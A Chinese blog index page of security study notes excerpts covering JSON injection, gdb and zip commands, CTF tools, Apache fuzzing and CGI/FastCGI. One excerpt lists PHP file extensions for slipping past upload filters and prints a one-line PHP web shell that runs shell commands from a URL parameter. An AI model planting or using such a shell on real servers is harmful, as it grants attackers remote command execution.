posted @ 2017-03-09 10:53
studyskill
阅读(3)
推荐(0)
编辑
摘要:
现在大部分web采用ajax通信,数据表现为json格式,因此可以尝试进行json注入。 json注入:根据实际情况进行注入。有的时候,可能是为了方便,有人会手动拼接下JSON,但是这种随手代码,却可能带来意想不到的安全隐患。第一种方式,利用字符串拼接:String user = "test01";
阅读全文
posted @ 2017-03-09 10:39
studyskill
阅读(4130)
推荐(0)
编辑
摘要:
1.gdb如何调试没有符号表(未加-g选项的编译)的程序disassemble main 2.kali中zip使用 zip -r archive_name.zip directory_to_compress 下面是如果解压一个zip文档: # unzip archive_name.zip 2.反编译
阅读全文
posted @ 2017-03-09 10:36
studyskill
阅读(211)
推荐(0)
编辑
摘要:
工具 https://www.ctftools.com/down/ Fuzzing Apache httpd server with American Fuzzy Lop + persistent mode https://sensepost.com/blog/2017/fuzzing-apache
阅读全文
posted @ 2017-03-09 10:35
studyskill
阅读(283)
推荐(0)
编辑
摘要:
简介版: 1.fastcgi与cgi区别:fastcgi通过线程来响应请求,而cgi对每个请求生成一个进程。 2.典型nginx数据传输过程:user->nginx->本地socket(请求传输)->fastcgi(即进程管理器)->cgi进程。 转(感谢下面两位同学): http://blog.c
阅读全文
posted @ 2017-03-09 10:00
studyskill
阅读(5060)
推荐(1)
编辑
摘要:
转:http://www.runoob.com/Python/python-cgi.html 什么是CGI CGI 目前由NCSA维护,NCSA定义CGI如下: CGI(Common Gateway Interface),通用网关接口,它是一段程序,运行在服务器上如:HTTP服务器,提供同客户端HT
阅读全文
posted @ 2017-03-09 09:54
studyskill
阅读(280)
推荐(0)
编辑
摘要:
1.php后缀限制 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml','PHT'; 2.php木马 <?php echo shell_exec($_GET['cmd']); ?>
阅读全文
posted @ 2017-03-09 09:53
studyskill
阅读(154)
推荐(0)
编辑